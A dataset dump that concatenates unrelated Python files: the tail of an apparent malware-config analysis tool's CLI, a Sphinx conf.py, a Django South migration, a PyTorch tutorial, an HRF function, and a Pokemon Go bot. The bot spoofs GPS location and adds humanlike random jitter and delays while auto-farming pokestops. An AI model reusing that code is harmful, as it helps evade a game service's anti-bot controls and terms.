    oParser.add_option('-l', '--licenseids', default='', help='License ID(s)/Watermark(s) to generate YARA rules for')
    oParser.add_option('-c', '--csv', action='store_true', default=False, help='Output config in CSV format')
    oParser.add_option('-p', '--password', default='infected', help='The ZIP password to be used (default infected)')
    oParser.add_option('-n', '--noextraction', action='store_true', default=False, help='Do not extract from archive file')
    oParser.add_option('-H', '--hash', action='store_true', default=False, help='Include hashes of file content')
    oParser.add_option('-x', '--xorkeys', action='store_true', default=False, help='Try all single byte XOR keys (not only 0x69 and 0x2e)')
    oParser.add_option('--literalfilenames', action='store_true', default=False, help='Do not interpret filenames')
    oParser.add_option('--recursedir', action='store_true', default=False, help='Recurse directories (wildcards and here files (@...) allowed)')
    oParser.add_option('--checkfilenames', action='store_true', default=False, help='Perform check if files exist prior to file processing')
    oParser.add_option('-j', '--jsoninput', action='store_true', default=False, help='Consume JSON from stdin')
    oParser.add_option('-J', '--jsonoutput', action='store_true', default=False, help='Output JSON')
    oParser.add_option('-V', '--verbose', action='store_true', default=False, help='Verbose output')
    oParser.add_option('--logfile', type=str, default='', help='Create logfile with given keyword')
    oParser.add_option('--logcomment', type=str, default='', help='A string with comments to be included in the log file')
    oParser.add_option('--ignoreprocessingerrors', action='store_true', default=False, help='Ignore errors during file processing')
    (options, args) = oParser.parse_args()
    # -m prints the embedded manual and exits.
    if options.man:
        oParser.print_help()
        PrintManual()
        return
    # JSON-from-stdin mode is mutually exclusive with positional file arguments.
    if len(args) != 0 and options.jsoninput:
        print('Error: option -j can not be used with files')
        return
    oLogfile = cLogfile(options.logfile, options.logcomment)
    # Expand @here-files, wildcards, cut (#c#) and flag (#f#) expressions.
    oExpandFilenameArguments = cExpandFilenameArguments(args, options.literalfilenames, options.recursedir, options.checkfilenames, '#c#', '#f#')
    oLogfile.Line('FilesCount', str(len(oExpandFilenameArguments.Filenames())))
    oLogfile.Line('Files', repr(oExpandFilenameArguments.Filenames()))
    if oExpandFilenameArguments.warning:
        PrintError('\nWarning:')
        PrintError(oExpandFilenameArguments.message)
        oLogfile.Line('Warning', repr(oExpandFilenameArguments.message))
    starttime = time.time()
    ProcessBinaryFiles(oExpandFilenameArguments.Filenames(), oLogfile, options)
    if options.verbose:
        print('Duration: %f' % (time.time() - starttime))
    if oLogfile.errors > 0:
        PrintError('Number of errors: %d' % oLogfile.errors)
    oLogfile.Close()
# Standard script entry point: run the CLI only when executed directly.
if __name__ == '__main__':
    Main()
| [
"[email protected]"
] | |
37f4be96948ac5d8e9f6f8094a2c25c829074819 | 45ee9a6d3ac82043241e96cbf2459e9d3937cd9c | /docs/source/conf.py | b7655eca2423b0fed3ffb8303d889a943a4dc47b | [
"MIT"
] | permissive | ggaughan/django-cities-light | 013f83e870e2f3eaf1ba93e212d83956b8b060a9 | bdd22248c7934d912b8e763360c132da2c794e27 | refs/heads/master | 2021-01-18T00:05:26.502029 | 2013-11-22T20:50:27 | 2013-11-22T20:50:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,421 | py | # -*- coding: utf-8 -*-
#
# django-cities-light documentation build configuration file, created by
# sphinx-quickstart on Sat May 19 19:32:33 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# NOTE: imports were previously on one line ('import os, sys, os.path') with a
# duplicate 'import os' further down; merged into one import per line.
import os
import os.path
import sys

sys.path.insert(0, os.path.abspath('../../'))
sys.path.insert(0, os.path.abspath('../../../../lib/python2.7/site-packages/'))

from django.conf import settings

# Configure Django with empty settings so autodoc can import the package.
settings.configure()

# Show both the class docstring and the __init__ docstring for autoclasses.
autoclass_content = "both"

# Read the Docs sets this environment variable on its build hosts; local
# builds fall back to a filesystem copy of the autocomplete-light docs.
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if on_rtd:
    intersphinx_mapping = {
        'autocompletelight': ('http://django-autocomplete-light.readthedocs.org/en/latest/', None),
    }
else:
    intersphinx_mapping = {
        'autocompletelight': ('file:///home/jpic/env/src/autocomplete-light/docs/build/html/', None),
    }
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode', 'sphinx.ext.intersphinx']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'django-cities-light'
copyright = u'2012, James Pic'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '2.1'
# The full version, including alpha/beta/rc tags.
release = '2.1.5'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'django-cities-lightdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'django-cities-light.tex', u'django-cities-light Documentation',
u'James Pic', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'django-cities-light', u'django-cities-light Documentation',
[u'James Pic'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'django-cities-light', u'django-cities-light Documentation',
u'James Pic', 'django-cities-light', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
| [
"[email protected]"
] | |
1cb30c9e269871d07348485c6437fce3c01a5415 | c4c159a21d2f1ea0d7dfaa965aeff01c8ef70dce | /flask/flaskenv/Lib/site-packages/pip/_vendor/msgpack/fallback.py | dd93d22d4040925980e877b62a2e0b299673c4bd | [] | no_license | AhsonAslam/webapi | 54cf7466aac4685da1105f9fb84c686e38f92121 | 1b2bfa4614e7afdc57c9210b0674506ea70b20b5 | refs/heads/master | 2020-07-27T06:05:36.057953 | 2019-09-17T06:35:33 | 2019-09-17T06:35:33 | 208,895,450 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 130 | py | version https://git-lfs.github.com/spec/v1
oid sha256:f85297381085e0252cf5010ea8096cb08f88640d230516b6ed589e1429e0302e
size 37491
| [
"github@cuba12345"
] | github@cuba12345 |
b2fb7e9429aba97f24de724038516d82b01d2628 | c35b1d9dd99c7b0ad3e8bee3293df7042f9ae39a | /flatpages_plus/migrations/0006_auto__add_field_flatpage_photo.py | aafdf685ac68e4d45ca808587c1bf1d9451669dc | [
"MIT"
] | permissive | grengojbo/django-flatpages-plus | 467b2e82d3f2d3c71629ddab5288e1416e5ddeda | 29af987565dd4c87fa3b0751105b5521e2690374 | refs/heads/master | 2020-12-24T20:42:23.064557 | 2014-03-02T17:29:22 | 2014-03-02T17:29:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,533 | py | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    def forwards(self, orm):
        """Apply the migration: add the nullable 'photo' image column to FlatPage."""
        # Adding field 'FlatPage.photo'
        db.add_column('flatpages_plus_flatpage', 'photo',
                      self.gf('sorl.thumbnail.fields.ImageField')(max_length=255, null=True, blank=True),
                      keep_default=False)
    def backwards(self, orm):
        """Reverse the migration: drop the 'photo' column again."""
        # Deleting field 'FlatPage.photo'
        db.delete_column('flatpages_plus_flatpage', 'photo')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'flatpages_plus.categories': {
'Meta': {'object_name': 'Categories'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
'flatpages_plus.flatpage': {
'Meta': {'ordering': "('url',)", 'object_name': 'FlatPage'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['flatpages_plus.Categories']", 'null': 'True', 'blank': 'True'}),
'content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
'enable_comments': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'enable_social': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'default': "u'unamed'", 'max_length': '80'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'to': "orm['auth.User']"}),
'photo': ('sorl.thumbnail.fields.ImageField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'registration_required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'sites': ('django.db.models.fields.related.ManyToManyField', [], {'default': '[1]', 'to': "orm['sites.Site']", 'symmetrical': 'False'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'p'", 'max_length': '1'}),
'template_name': ('django.db.models.fields.CharField', [], {'max_length': '70', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '150', 'db_index': 'True'}),
'views': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'})
},
'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'taggit.tag': {
'Meta': {'object_name': 'Tag'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100'})
},
'taggit.taggeditem': {
'Meta': {'object_name': 'TaggedItem'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_tagged_items'", 'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_items'", 'to': "orm['taggit.Tag']"})
}
}
complete_apps = ['flatpages_plus'] | [
"[email protected]"
] | |
af5d7b1d518ffbf1091fa797c5bab04d0ceafc39 | 5b5eb61c02a1ee6632036a31108d5c962d474d2e | /00/pytorch.py | bae78442e40b561cf168d0df6d691ad703c08406 | [] | no_license | seven320/deeplearning | 73c76fa5e006a9164ed11fe9538b4975c0bdc161 | 56300e450caf390b4f953a9c882a9b4701ccb971 | refs/heads/master | 2021-04-26T22:27:47.019462 | 2018-11-06T02:09:04 | 2018-11-06T02:09:04 | 124,096,522 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,648 | py |
# coding: utf-8
# pytorch とは?
# https://pytorch.org/tutorials/beginner/blitz/tensor_tutorial.html#sphx-glr-beginner-blitz-tensor-tutorial-py
# In[ ]:
from __future__ import print_function
import torch
x = torch.empty(5, 3)
print(x)
# ランダム初期設定行列(randomly initialized matrix)
# In[7]:
x = torch.rand(5,3)
print(x)
# In[ ]:
# Zero-initialized matrix (0初期設定の行列) — this was a bare markdown line left
# uncommented by the notebook export, which made the script a SyntaxError.
# In[8]:
x = torch.zeros(5, 3, dtype=torch.long)
print(x)
# 実際の値からの行列
# In[9]:
x = torch.tensor([5.5, 3])
print(x)
# In[11]:
x = x.new_ones(5, 3, dtype=torch.double)
print(x)
x = torch.randn_like(x, dtype=torch.float)
print(x)
# In[14]:
print(x.size())
# In[25]:
# x = x.new_ones(5, 3, dtype=torch.double)
x = torch.randn_like(x, dtype=torch.float)
y = torch.rand(5,3)
print(x + y)
# print(x + y)
# In[26]:
print(torch.add(x, y))
# In[29]:
result = torch.empty(5,3)
torch.add(x, y, out=result)
print(result)
# In[30]:
y.add_(x)
print(y)
# In[32]:
print(x)
print(x[:, 1])
# In[36]:
x = torch.randn(4,4)
y = x.view(8,2)
z = x.view(-1, 8)
print(x.size(),y.size(),z.size())
# In[38]:
x = torch.randn(1)
print(x)
print(x.item())
# In[40]:
a = torch.ones(5)
print(a)
# In[47]:
import numpy as np
b = a.numpy()
print(b)
c = np.copy(a.numpy())
print(c)
# In[42]:
a.add_(1)
print(a)
print(b)
# In[49]:
a = np.ones(5)
b = torch.from_numpy(a)
print(a,b)
np.add(a, 1, out=a)
print(a,b)
# In[50]:
if torch.cuda.is_available():
device = torch.device("cuda")
y = torch.ones_like(x, device=device)
x = x.to(device)
z = x + y
print(z)
print(z.to("cpu", torch.double))
| [
"[email protected]"
] | |
4a70189f56b7c999e46df08262eb3ac37e231c87 | 77871bb4c5f4714a19c33ad804a20c94bcdacc7e | /Interfaces/AI/Stepper/Pokestopper.py | abd44d28f5e7de1647e7ca9a35e479c9fd8da45b | [] | no_license | MaxOnNet/PokeStats | 58165f449acf3fc5b14e4f3a63a783f947df3eb8 | 3eb5aa2d13833b1d2299023f4d6f88348bae3bd6 | refs/heads/master | 2021-01-20T20:28:56.999545 | 2016-08-24T08:06:41 | 2016-08-24T08:06:41 | 63,936,162 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,961 | py | # -*- coding: utf-8 -*-
import logging
import random
from math import ceil
from sqlalchemy import text as sql_text
from Interfaces.MySQL.Schema import Pokestop, parse_map_cell
from Interfaces.AI.Human import sleep, random_lat_long_delta, action_delay
from Interfaces.AI.Stepper.Normal import Normal
from Interfaces.AI.Worker.Utils import format_time, distance
from Interfaces.pgoapi.utilities import f2i, h2f, get_cell_ids
log = logging.getLogger(__name__)
class Pokestopper(Normal):
    def inicialise(self):
        """Override scanner-mode settings from the DB for pokestop-only scanning.

        (The Russian log line reads: "Pokestop point scan, overriding DB variables".)
        NOTE(review): the 'inicialise' spelling is kept — callers elsewhere use it.
        """
        log.info('Точечное сканирование P\S, переопределяем переменные БД')
        # Small step and walking speed; only pokestop farming is enabled.
        self.scanner.mode.step = 0.0015
        self.scanner.mode.walk = 6
        self.scanner.mode.is_catch = False
        self.scanner.mode.is_farm = True
        self.scanner.mode.is_lookup = False
        self.scanner.mode.is_defender = False
    def take_step(self):
        """Visit every nearby pokestop: walk (or jump) to each coordinate and farm it."""
        # Start from the configured origin and publish the planned route.
        position = [self.origin_lat, self.origin_lon, 0]
        coords = self.generate_coords(self.origin_lat, self.origin_lon, self.step, self.distance)
        self.metrica.take_position(position, self.geolocation.get_google_polilyne(coords))
        self.api.set_position(*position)
        step = 1
        for coord in coords:
            self.metrica.take_status(scanner_msg='Point P\S ({} / {})'.format(step, len(coords)))
            log.info('Точечное сканирование P\S ({} / {})'.format(step, len(coords)))
            position = (coord['lat'], coord['lng'], 0)
            # Simulate walking when a speed is configured; otherwise teleport.
            if self.walk > 0:
                self._walk_to(self.walk, *position)
            else:
                self.api.set_position(*position)
            self.ai.heartbeat()
            # Farm only the pokestop at this point (no pokemon/gym handling).
            self._work_at_position(position[0], position[1], position[2], seen_pokemon=False, seen_pokestop=True, seen_gym=False, data=coord['id'])
            action_delay(self.ai.delay_action_min, self.ai.delay_action_max)
            step += 1
    def _walk_to(self, speed, lat, lng, alt):
        """Move toward (lat, lng, alt) in steps of *speed* metres, jittering each step.

        (The Russian log line reads: "Running from <here> to <there>,
        <dist> m in a straight line. <estimated time>".)
        """
        dist = distance(self.api._position_lat, self.api._position_lng, lat, lng)
        steps = (dist + 0.0) / (speed + 0.0) # may be rational number
        intSteps = int(steps)
        residuum = steps - intSteps  # fractional remainder of the last step; currently unused
        log.info('Бежим из ' + str((self.api._position_lat, self.api._position_lng)) + " в " + str(str((lat, lng))) +
                 " на " + str(round(dist, 2)) + " по прямой. " + str(format_time(ceil(steps))))
        if steps != 0:
            dLat = (lat - self.api._position_lat) / steps
            dLng = (lng - self.api._position_lng) / steps
            for i in range(intSteps):
                # Each intermediate point gets a small random offset to look human.
                cLat = self.api._position_lat + dLat + random_lat_long_delta()
                cLng = self.api._position_lng + dLng + random_lat_long_delta()
                self.api.set_position(cLat, cLng, alt)
                self.ai.heartbeat()
                action_delay(self.ai.delay_action_min, self.ai.delay_action_max)
        # Snap exactly onto the destination at the end.
        self.api.set_position(lat, lng, alt)
        self.ai.heartbeat()
def _work_at_position(self, lat, lng, alt, seen_pokemon=False, seen_pokestop=False, seen_gym=False, data=None):
if data is not None:
pokestop = self.session.query(Pokestop).get(data)
cell = {
'forts': [
{
'id': pokestop.id,
'type': 1,
'latitude': pokestop.latitude,
'longitude': pokestop.longitude
}
]
}
self.metrica.take_search({'pokestops': 1})
self.api.set_position(lat, lng, alt)
self.ai.work_on_cell(cell, (lat, lng, alt), seen_pokemon=False, seen_pokestop=True, seen_gym=False)
position = (lat, lng, alt)
cellid = get_cell_ids(lat, lng)
timestamp = [0, ] * len(cellid)
map_cells = list()
sleep(self.ai.delay_scan)
response_dict = self.api.get_map_objects(latitude=f2i(lat), longitude=f2i(lng), since_timestamp_ms=timestamp, cell_id=cellid)
self.search.search(lat, lng)
if response_dict and 'status_code' in response_dict:
if response_dict['status_code'] is 1:
if 'responses' in response_dict:
if 'GET_MAP_OBJECTS' in response_dict['responses']:
if 'status' in response_dict['responses']['GET_MAP_OBJECTS']:
if response_dict['responses']['GET_MAP_OBJECTS']['status'] is 1:
map_cells = response_dict['responses']['GET_MAP_OBJECTS']['map_cells']
# Update current scanner location
self.metrica.take_position(position)
map_cells.sort(key=lambda x: distance(lat, lng, x['forts'][0]['latitude'], x['forts'][0]['longitude']) if 'forts' in x and x['forts'] != [] else 1e6)
log.debug("Получена информация о карте в размере {0} ячеек".format(len(map_cells)))
for cell in map_cells:
self.metrica.take_search(parse_map_cell(cell, self.session))
else:
log.warning("Получен неверный статус: {0}".format(response_dict['responses']['GET_MAP_OBJECTS']['status']))
else:
log.warning("Получен неверный статус: {0}".format(response_dict['status_code']))
self.api.set_position(lat, lng, alt)
for cell in map_cells:
self.ai.work_on_cell(cell, position, seen_pokemon=seen_pokemon, seen_pokestop=seen_pokestop, seen_gym=seen_gym)
    def generate_coords(self, latitude, longitude, step_size, distance):
        """Return pokestops within *distance* metres of (latitude, longitude).

        Each entry is {'lat', 'lng', 'id'}, with a small random jitter applied
        to the coordinates so visits look human.
        NOTE(review): *step_size* is accepted but unused here. The SQL is built
        with str.format from internally supplied numeric values; if these could
        ever come from user input, switch to bound parameters.
        """
        # Haversine-style distance in metres, computed in SQL.
        sql = """
        SELECT
            id as "pokestop_id",
            latitude as "pokestop_latitude",
            longitude as "pokestop_longitude",
            (
                6371 * acos (
                cos ( radians({0}) )
                * cos( radians( latitude ) )
                * cos( radians( longitude ) - radians({1}) )
                + sin ( radians({2}) )
                * sin( radians( latitude ) )
                ) * 1000
            ) AS "pokestop_distance"
            FROM pokestop
            HAVING pokestop_distance < {3}
            ORDER BY pokestop_distance
        """.format(latitude, longitude, latitude, distance)
        coords = []
        for pokestop in self.session.execute(sql_text(sql)):
            lat = pokestop[1] + random_lat_long_delta()
            lng = pokestop[2] + random_lat_long_delta()
            coords.append({'lat': lat, 'lng': lng, 'id': pokestop[0]})
        return coords
"[email protected]"
] | |
72d83f61ea7278de06a9f45c110a3ffba2430063 | 163808746e51d378f69a966645b8bb8a855b4625 | /MyMain1012/MyMain1012/mislHrf.py | 860d28ba23c0e7b4b51f525d9b16734181920a56 | [] | no_license | 0024thiroshi/comm5.0_fall_semester | 02b26b506b759dd7b18b963295a8908cb4a78245 | db350599b7085e56fbf2c316e74cd7a5b48f02b8 | refs/heads/main | 2023-02-12T13:07:34.080809 | 2021-01-13T06:03:04 | 2021-01-13T06:03:04 | 329,202,576 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 895 | py | import scipy
import numpy as np
from math import exp
import pandas as pd
import scipy.stats as sps
import matplotlib.pyplot as plt
import math
def hrf(nt,
        peak_delay=6,
        under_delay=10,
        p_u_ratio=6,
        peak_disp=1,
        under_disp=1,
        normalize=True):
    """Sample a canonical double-gamma haemodynamic response function.

    The response is evaluated on the grid t = 0, nt, 2*nt, ..., 30 and only
    strictly positive time points are kept, so the returned array has
    ``len(np.arange(0, 30 + nt, nt)) - 1`` samples.

    Parameters
    ----------
    nt : float
        Sampling interval in seconds (時間間隔).
    peak_delay : float, optional
        Gamma shape (times scale) controlling the positive peak position.
    under_delay : float, optional
        Additional delay of the undershoot relative to the peak.
    p_u_ratio : float, optional
        Peak-to-undershoot amplitude ratio.
    peak_disp, under_disp : float, optional
        Dispersion (gamma scale) of peak and undershoot. Previously hard-coded
        locals set to 1; exposed as backward-compatible keyword parameters.
    normalize : bool, optional
        When True (default) scale the curve so its maximum equals 1.

    Returns
    -------
    numpy.ndarray
        The sampled HRF.
    """
    t = np.arange(0, 30 + nt, nt)
    pos_t = t[t > 0]
    # BUGFIX: removed dead 'hrf = np.zeros(t.shape, dtype=np.float)' — it was
    # immediately overwritten, and np.float was removed in NumPy >= 1.24.
    peak = sps.gamma.pdf(pos_t,
                         peak_delay / peak_disp,
                         loc=0,
                         scale=peak_disp)
    undershoot = sps.gamma.pdf(pos_t,
                               (under_delay + peak_delay) / under_disp,
                               loc=0,
                               scale=under_disp)
    curve = peak - undershoot / p_u_ratio
    if not normalize:
        return curve
    return curve / np.max(curve)
| [
"“[email protected]”"
] | |
b2eb613a9162290732d40c2631fdb47d3cb98dbf | af3ec207381de315f4cb6dddba727d16d42d6c57 | /dialogue-engine/src/programy/storage/stores/sql/dao/link.py | f6447200627f0fc643988dcc8badf78e7d13dab7 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | mcf-yuichi/cotoba-agent-oss | 02a5554fe81ce21517f33229101013b6487f5404 | ce60833915f484c4cbdc54b4b8222d64be4b6c0d | refs/heads/master | 2023-01-12T20:07:34.364188 | 2020-11-11T00:55:16 | 2020-11-11T00:55:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,960 | py | """
Copyright (c) 2020 COTOBA DESIGN, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
"""
Copyright (c) 2016-2019 Keith Sterling http://www.keithsterling.com
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
